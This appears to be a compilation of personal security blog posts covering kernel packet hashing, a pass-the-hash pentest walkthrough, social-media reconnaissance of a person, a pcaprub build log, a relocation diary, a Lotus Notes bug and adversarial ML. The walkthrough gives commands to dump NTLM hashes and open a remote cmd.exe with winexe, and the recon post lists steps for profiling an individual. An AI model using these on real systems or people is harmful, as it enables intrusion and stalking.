It’s a brand new day with no novelty! Back to the lab today trying to now get access to the packet data to calculate the hash values. I suspect that inside netfilter’s sk_buff structure there’s an unsigned char* data field. This probably is exactly what I need to get the hash values. There’s this awesome link which has great information about sk_buff structure. The unsigned int len; has the size of the complete input data including the headers. I guess if this len value == size of the actual data for the IP header (which could be TCP header / UDP header / ICMP header) then if we are using chunks of this data to find hashes then the following algorithm could be used:

no_of_chunks = len / BYTE_SIZE_FOR_SIGN;

for (int i = 0; i < no_of_chunks; i++)
{
  storeInTable(hashRabin(data,i*BYTE_SIZE_FOR_SIGN,
               (i+1)*BYTE_SIZE_FOR_SIGN - 1 ,0));
}
storeInTable(
hashRabin(data,no_of_chunks*BYTE_SIZE_FOR_SIGN,
        no_of_chunks*BYTE_SIZE_FOR_SIGN+addendum, 0)
);

This are my initial thoughts let’s see how it works out!

-Rajat.
Rajat’s Homepage

In a pen test, it’s always the race to the finish. Either you get to the domain admin or r00t or you die tryin’! 🙂 But thanks to some real l33t fu by Hernan Ochoa this has only been made easy for you.
The key to pass-the-hash attacks is that Windows NTLM authentication relies on the passing of the right hash to identify you. As long as the right hash is stored in the authenticated session you are who you say you are.
Hernan Ochoa’s Pass-the-hash toolkit (http://oss.coresecurity.com/projects/pshtoolkit.htm) is precisely the tool for that. Once you gain local admin rights on a box, just run the whosthere.exe utility on the box. Mind you, in differing versions of Windows you need some right addresses to pass as parameters. So the first thing to do is goto C:\WINDOWS\system32 and copy the lsasrv.dll file onto your local machine. The pass-the-hash src tar ball, has an IDA Pro script passthehash.idc that you need to run after opening the file in IDA Pro. This will give you the right addresses to pass to whosthere.exe:
whosthere.exe -a -o outputfile.txt

Once you have the hash you could either use iam.exe or winexe (http://eol.ovh.org/winexe/) with pass-the-hash patch from jo-mo-kun (http://www.foofus.net/jmk/tools/winexe), or samba with jomo kun’s pass the hash patch.
Just set the Environment variable SMBHASH to the hash value such as

export SMBHASH="92D887C9910492C3254E2DF489A880E4:7A2EDE4F51B94203984C6BA21239CF63"

Then run winexe as

./winexe -U "Domain\\Username" //192.168.0.1 "cmd.exe"

Of course, you can also expend some time in cracking the LM hashes to get the actual passwords but it isn’t really necessary.

Back in the day “recon” had a different meaning than it does today. Today, in the age of cyber-terrorism and cyber-stalking or Google stalking, reconnaissance comes from a variety of different sources including tools such as mash-up applications make things quite palpable for a social engineer. For the purpose of this discussion, let’s consider two entities “stalker” (the person seeking information about “someone”) and the “stalkee” (the “someone” whose information is being sought).
Back in the day (and man I’m only talking about 4-5 years ago!), the only source was public forums where users would post questions using constant email IDs. You would need to scourge through different Usenet groups and that was it…and possibly a Friendster account. Now, people have Facebook profiles which can be publicly viewed. This gives us the information about a person’s friends giving us information about the stalkee’s geographical location and may be even birthday. LinkedIn gives information about the stalkee’s job. You can even confirm the geographical location of the stalkee using LinkedIn. Now you have the name of the person and the geographical location. If you need more information about the person such as his/her age/birthdate, I’ve seen that ZabaSearch is a good resource. You can get a lot of information using ZabaSearch but if the stalkee needs he/she can remove this information using the block feature of Zaba located here. I do not know how they deal with this information but Zaba does have a “premium service” and I do not know if this premium service would give access to these “blocked records”. Now you have the information about the age of the stalkee. You could even search Twitter for the person’s twitter feed to see what the stalkee’s doing. I came across an interesting mashup application that crawls twitter to get information about where a person is and it’s aptly called Please Rob Me!. There are other great tools available such as Loopt and Tripit. Just as Twitter, Google Buzz can also give a lot of information. And the best part about google buzz is things are searchable …cool…the stalker’s job’s now easier.

If you encounter the following error, the issue is pcaprub uses a hardcoded path for Winpcap.  I downloaded winpcap v4.1.3 and downloaded the dev kit for Winpcap and put it in c:\WpdPack.   Additionally, since I use an x64 machine I had to copy the file C:\WpdPack\Lib\x64\*.lib into C:\WpdPack\Lib and then the compilation worked.

You need pcaprub for things like msf.

C:\dev\kit>gem install pcaprub
Temporarily enhancing PATH for MSYS/MINGW...
Building native extensions. This could take a while...
ERROR: Error installing pcaprub:
ERROR: Failed to build gem native extension.

current directory: C:/Ruby24-x64/lib/ruby/gems/2.4.0/gems/pcaprub-0.13.0/ext/pcaprub_c
C:/Ruby24-x64/bin/ruby.exe -r ./siteconf20181112-2628-1wqgu6f.rb extconf.rb

[*] Running checks for pcaprub_c code...
platform is x64-mingw32
checking for -lws2_32... yes
checking for -liphlpapi... yes
checking for windows.h... yes
checking for winsock2.h... yes
checking for iphlpapi.h... yes
checking for ruby/thread.h... yes
checking for rb_thread_blocking_region()... no
checking for rb_thread_call_without_gvl()... yes
checking for pcap_open_live() in -lwpcap... no
checking for pcap_setnonblock() in -lwpcap... no
creating Makefile

current directory: C:/Ruby24-x64/lib/ruby/gems/2.4.0/gems/pcaprub-0.13.0/ext/pcaprub_c
make "DESTDIR=" clean

current directory: C:/Ruby24-x64/lib/ruby/gems/2.4.0/gems/pcaprub-0.13.0/ext/pcaprub_c
make "DESTDIR="
generating pcaprub_c-x64-mingw32.def
compiling pcaprub.c
In file included from C:/WpdPack/include/pcap/pcap.h:41,
from C:/WpdPack/include/pcap.h:45,
from pcaprub.c:11:
C:/WpdPack/include/pcap-stdinc.h:64: warning: "snprintf" redefined
#define snprintf _snprintf

In file included from C:/Ruby24-x64/include/ruby-2.4.0/ruby/ruby.h:2429,
from C:/Ruby24-x64/include/ruby-2.4.0/ruby.h:33,
from pcaprub.c:1:
C:/Ruby24-x64/include/ruby-2.4.0/ruby/subst.h:6: note: this is the location of the previous definition
#define snprintf ruby_snprintf

In file included from C:/WpdPack/include/pcap/pcap.h:41,
from C:/WpdPack/include/pcap.h:45,
from pcaprub.c:11:
C:/WpdPack/include/pcap-stdinc.h:65: warning: "vsnprintf" redefined
#define vsnprintf _vsnprintf

In file included from C:/Ruby24-x64/include/ruby-2.4.0/ruby/ruby.h:2429,
from C:/Ruby24-x64/include/ruby-2.4.0/ruby.h:33,
from pcaprub.c:1:
C:/Ruby24-x64/include/ruby-2.4.0/ruby/subst.h:7: note: this is the location of the previous definition
#define vsnprintf ruby_vsnprintf

pcaprub.c: In function 'rbpcap_each_data':
pcaprub.c:992:9: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
fno = (int)pcap_getevent(rbp->pd);
^
pcaprub.c:992:7: warning: assignment to 'HANDLE' {aka 'void *'} from 'int' makes pointer from integer without a cast [-W
int-conversion]
fno = (int)pcap_getevent(rbp->pd);
^
pcaprub.c: In function 'rbpcap_each_packet':
pcaprub.c:1034:9: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
fno = (int)pcap_getevent(rbp->pd);
^
pcaprub.c:1034:7: warning: assignment to 'HANDLE' {aka 'void *'} from 'int' makes pointer from integer without a cast [-
Wint-conversion]
fno = (int)pcap_getevent(rbp->pd);
^
pcaprub.c: In function 'rbpcap_thread_wait_handle':
pcaprub.c:1274:7: warning: passing argument 1 of 'rb_thread_call_without_gvl' from incompatible pointer type [-Wincompat
ible-pointer-types]
rbpcap_thread_wait_handle_blocking,
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In file included from pcaprub.c:4:
C:/Ruby24-x64/include/ruby-2.4.0/ruby/thread.h:28:7: note: expected 'void * (*)(void *)' but argument is of type 'VALUE
(*)(void *)' {aka 'long long unsigned int (*)(void *)'}
void *rb_thread_call_without_gvl(void *(*func)(void *), void *data1,
^~~~~~~~~~~~~~~~~~~~~~~~~~
linking shared-object pcaprub_c.so
pcaprub.o:pcaprub.c:(.text+0x1a0): undefined reference to `pcap_lib_version'
pcaprub.o:pcaprub.c:(.text+0x1e0): undefined reference to `pcap_findalldevs'
pcaprub.o:pcaprub.c:(.text+0x2b8): undefined reference to `pcap_freealldevs'
pcaprub.o:pcaprub.c:(.text+0x32f): undefined reference to `pcap_lookupnet'
pcaprub.o:pcaprub.c:(.text+0x43d): undefined reference to `pcap_close'
pcaprub.o:pcaprub.c:(.text+0x45a): undefined reference to `pcap_dump_close'
pcaprub.o:pcaprub.c:(.text+0x67c): undefined reference to `pcap_set_timeout'
pcaprub.o:pcaprub.c:(.text+0x6ce): undefined reference to `pcap_list_datalinks'
pcaprub.o:pcaprub.c:(.text+0x707): undefined reference to `pcap_datalink_val_to_name'
pcaprub.o:pcaprub.c:(.text+0x76d): undefined reference to `pcap_free_datalinks'
pcaprub.o:pcaprub.c:(.text+0x782): undefined reference to `pcap_geterr'
pcaprub.o:pcaprub.c:(.text+0x828): undefined reference to `pcap_datalink_name_to_val'
pcaprub.o:pcaprub.c:(.text+0x895): undefined reference to `pcap_set_datalink'
pcaprub.o:pcaprub.c:(.text+0x8b3): undefined reference to `pcap_geterr'
pcaprub.o:pcaprub.c:(.text+0x93f): undefined reference to `pcap_set_snaplen'
pcaprub.o:pcaprub.c:(.text+0x9d4): undefined reference to `pcap_set_promisc'
pcaprub.o:pcaprub.c:(.text+0xae1): undefined reference to `pcap_lookupnet'
pcaprub.o:pcaprub.c:(.text+0xb57): undefined reference to `pcap_compile'
pcaprub.o:pcaprub.c:(.text+0xb6d): undefined reference to `pcap_geterr'
pcaprub.o:pcaprub.c:(.text+0xb9f): undefined reference to `pcap_setfilter'
pcaprub.o:pcaprub.c:(.text+0xbaf): undefined reference to `pcap_freecode'
pcaprub.o:pcaprub.c:(.text+0xbc1): undefined reference to `pcap_geterr'
pcaprub.o:pcaprub.c:(.text+0xbe9): undefined reference to `pcap_freecode'
pcaprub.o:pcaprub.c:(.text+0xc62): undefined reference to `pcap_compile'
pcaprub.o:pcaprub.c:(.text+0xc75): undefined reference to `pcap_geterr'
pcaprub.o:pcaprub.c:(.text+0xc9d): undefined reference to `pcap_freecode'
pcaprub.o:pcaprub.c:(.text+0xccf): undefined reference to `pcap_activate'
pcaprub.o:pcaprub.c:(.text+0xd33): undefined reference to `pcap_close'
pcaprub.o:pcaprub.c:(.text+0xe0b): undefined reference to `pcap_close'
pcaprub.o:pcaprub.c:(.text+0xe43): undefined reference to `pcap_create'
pcaprub.o:pcaprub.c:(.text+0x109e): undefined reference to `pcap_close'
pcaprub.o:pcaprub.c:(.text+0x110d): undefined reference to `pcap_open_live'
pcaprub.o:pcaprub.c:(.text+0x129f): undefined reference to `pcap_open_offline'
pcaprub.o:pcaprub.c:(.text+0x1419): undefined reference to `pcap_open_dead'
pcaprub.o:pcaprub.c:(.text+0x1532): undefined reference to `pcap_dump_open'
pcaprub.o:pcaprub.c:(.text+0x15d9): undefined reference to `pcap_dump_close'
pcaprub.o:pcaprub.c:(.text+0x171e): undefined reference to `pcap_dump'
pcaprub.o:pcaprub.c:(.text+0x17e7): undefined reference to `pcap_sendpacket'
pcaprub.o:pcaprub.c:(.text+0x17fa): undefined reference to `pcap_geterr'
pcaprub.o:pcaprub.c:(.text+0x18ea): undefined reference to `pcap_setnonblock'
pcaprub.o:pcaprub.c:(.text+0x1912): undefined reference to `pcap_dispatch'
pcaprub.o:pcaprub.c:(.text+0x19fd): undefined reference to `pcap_setnonblock'
pcaprub.o:pcaprub.c:(.text+0x1a25): undefined reference to `pcap_dispatch'
pcaprub.o:pcaprub.c:(.text+0x1b35): undefined reference to `pcap_getevent'
pcaprub.o:pcaprub.c:(.text+0x1be3): undefined reference to `pcap_getevent'
pcaprub.o:pcaprub.c:(.text+0x1c91): undefined reference to `pcap_datalink'
pcaprub.o:pcaprub.c:(.text+0x1cdc): undefined reference to `pcap_major_version'
pcaprub.o:pcaprub.c:(.text+0x1d27): undefined reference to `pcap_minor_version'
pcaprub.o:pcaprub.c:(.text+0x1d72): undefined reference to `pcap_snapshot'
pcaprub.o:pcaprub.c:(.text+0x1dca): undefined reference to `pcap_stats'
collect2.exe: error: ld returned 1 exit status
make: *** [Makefile:259: pcaprub_c.so] Error 1

make failed, exit code 2

Gem files will remain installed in C:/Ruby24-x64/lib/ruby/gems/2.4.0/gems/pcaprub-0.13.0 for inspection.
Results logged to C:/Ruby24-x64/lib/ruby/gems/2.4.0/extensions/x64-mingw32/2.4.0/pcaprub-0.13.0/gem_make.out

A moratorium for 3 months on the blogspot. The things have changed dramatically when it comes to the life. A lot has happened in my life since the time I left Los Angeles, CA to come to New York, NY. The two of the biggest cities of not only the USA but in the world as well.
First things first…got a job for Ernst & Young’s Advanced Security Center and so like most of the people who work in New York I live in Jersey City, NJ and travel to work. The travel is not too bad as it takes about 45 mins door-to-door. Also, by living in New Jersey instead of 5 boroughs (New Yorkers call the collection of 5 islands of Manhattan, Queens, Brooklyn, Bronx, Statten Island as the 5 boroughs) one saves the 4% annual New York city tax.
Now for the topic of this blog which is “Moving”…which is probably the most troublesome experience that people have. It wasn’t too good for me either but it could have been worse if it were not for the help of some good friends. People say that you realize the truthfulness of your friends during the time of adversity. It was exactly what I found. Whereas some people came to the fore to help me in all the ways they could, some stayed at the bay (and in some cases … making sure that the buoy of my life was in doldrums). Well…having said that life is but a bunch of grapes … some sweet and some sour (this is something I heard in the Hindi Movie “Khatta Meetha”)!
Finding apartments in the New York area can be a harrowing experience, especially if you are hard strung on budget. That was exactly what I found. The best places to look for are New Jersey Craigslist and New York Craigslist. Other places are Rent.com and Apartments.com but I did not find them much useful. I found that New York had some really good places to rent even with a tight budget. All these places were in Queens (Rego Park, Forest Hills). The good part was one could get a 2BR for $1450+ in these places. These places were not too far from the Subway stations and had a travel of 40-45 mins to Manhattan and 1 hr to Long Island (using Long Island Rail Road aka LIRR).
Jersey City in NJ is also a very good bet. But there are some places in Jersey City that are posh as hell but you have to pay the price for the class. Exchange place and Pavonia/Newport are examples of these places (with prices around $1700 for 1 BR) . Grove street is also a place which is somewhere in between the posh and the not-at-all posh. Even though the prices in Exchange place and Newport are really high but the class is well worth the money. Especially when you consider that getting a similar type of apartment in Manhattan will cost at least twice or may be thrice as much. Another avenue for exploration is Hoboken, NJ. Hoboken was personally my favorite place to look for an apartment because it is a place with a vibrancy associated with it. Almost looks like a European city bustling with restaurants and youth on the streets! It is also not too far from New York. However just like Pavonia/Newport & Exchange Place this fun doesn’t come cheap! The apartment costs are similar. The difference between Newport – Exchange Place & Hoboken is that the construction in Hoboken is older and you need a realtor for getting an apartment more than you need in former. Realtors have standard 1 month rent as the fee as their service charges.
In case you are wondering what a realtor is – a realtor is a person who searches for an apartment for you that fits within your budget and choice. But when it comes to realtors one must be wary of them because they can sometimes be a dangerous bet to pick!
West coast was much easier to find apartments in from my experience but it could be because I was looking for apartments in a University area which is probably easier.

-Rajat
http://rajatswarup.blogspot.com/

If you are a South Indian, have a long name, use lotus notes and want to send encrypted e-mail using Internet Certificates…you may just be out of luck! Why?
Lotus Notes 6 does not support importing of PKCS#12 (.pfx) certificates which have the CN (Customer name), OU (Organization unit), O (Organization), CA (Certificatio Authority) fields together more than 255 characters. Many of my south Indian friends in fact have names that are 40 characters themselves! Alongwith the O, OU and the CA taken together this could easily exceed more than 255 characters. On encountering such a situation, Lotus Notes also gives a friendly error message which my friends may not find quite amusing at that point “Name too long”. Once you encounter this error, you cannot proceed with the import. To work around this see if you can reduce the characters in OU and O fields because your e-mail ID has to match the one in Lotus.
I also found a useless response from IBM to get rid of this problem. Their response was pretty much “learn to deal with it! we won’t correct our stupid software”.
Justin’s written a pretty useful how to on importing S/MIME certificates into Lotus notes.

The world of Artificial Intelligence (AI) seems to be exploding with the release of ChatGPT. But as soon as the the chat bot came into the hands of public people started finding self-sabotaging queries at worst (exploitable issues) and some weird interactions whereby people could write malware that could stay undetected by Endpoint Detection and Response (EDR) bypasses.

What is AI?

Very simply, Artificial Intelligence (per Wikipedia) is intelligence demonstrated by machines. But technically, it is a set of algorithms that can make do things that a human does by making an inference, similar to humans, on the basis of data that was historically provided as “reference” to make the decisions. This reference data is called as training data. And the data which is used to test the effectiveness of the algorithm to arrive at a decision on the basis of that reference, is called as test data. Any good machine learning course teaches how do you design data and how much data to use for training and how much to use for testing and metrics of performance but that is not relevant to our discussion here – however, what’s important is that it is the data that you provide that controls the decision-making in an artificially intelligent algorithm. This is a key difference between typical algorithms (where the code is more or less static and makes decisions on certain states in the program) whereas in an artificially intelligent system you can have the program arrive at different decisions depending on how one decides to “train” the algorithms.

What is ML?

Machine Learning (ML) is a subset of Artificial Intelligence (AI) where the artificial intelligent algorithms evolve their decision-making on the basis of data that has been processed and tagged as training data. ML systems have been used in classifying spam or anomaly detection in computer security. These systems tend to use statistical inference to establish a baseline and highlight situations where the input data does not fall within the norm. When operational data is being used to train ML-based system one has to be careful that we are not incrementally altering the baselines of what’s normal and what’s not. Such “tilting” may happen over time and its important to protect against drift of such systems. Some “drift” is ok but “bad drift” is not – which is hard to predict. E.g., let’s say you classify some data inaccurately and accidentally/maliciously end up using it for training your ML-models but if it inherently alters the behavior of the ML model, then the model becomes unreliable.

What is Adversarial AI?

Adversarial Artificial Intelligence (AI) based threats are ones where malicious actors design the inputs to make models predict erroneously. There are a couple of different types of attack here – poisoning attack (where you train models with bad data controlled by adversaries) or an evasion attack (where you make the artificial intelligence system make a bad inference with a security implication). The way to understand these attacks is that the poisoning attack is basically “Garbage-in-garbage-out” but its this really “special” garbage. This is garbage that changes the behavior of the algorithm in a way that the algorithms returns an incorrect result when it has to make a decision. The inferential attacks are different in that the decision made is wrong because the input is such that it appears differently to the ML algorithm than it does to humans. E.g., Gaussian noise being classified as a human or a fingerprint being matched incorrectly.

Can we attack these systems in other ways?

In a paper presented by Google researchers created a tool (TensorFuzz) that they were able to demonstrate finding a few varieties of bugs in Deep Neural Networks (DNNs). So typical software attack techniques do work against the deep neural networks too. Fuzzing has been used for decades and has caused faults in code forever. At its core, fuzzing is simple, send garbage input that causes a failure in the program. It’s just that the failures in DNN are different and you want to ensure the software relying on the DNN to make a decision handles such failures appropriately and do not cause a security failure with secure defaults.

Protection mechanisms

There are a few simple ways to look at ML systems and security thereof. Microsoft released an excellent howto on how to threat model ML systems. Additionally, using adversarial training data is imperative to ensure that artificially intelligent algorithms performs as you expect them to in the presence of adversarial data. When you rely on ML-based systems, its all the more important that you test it appropriately and continue to do so against baselines. Unfortunately, for Deep Neural Networks transparency of decision making continues to be an issue and needs the AI/ML researchers to establish appropriate transparency measures.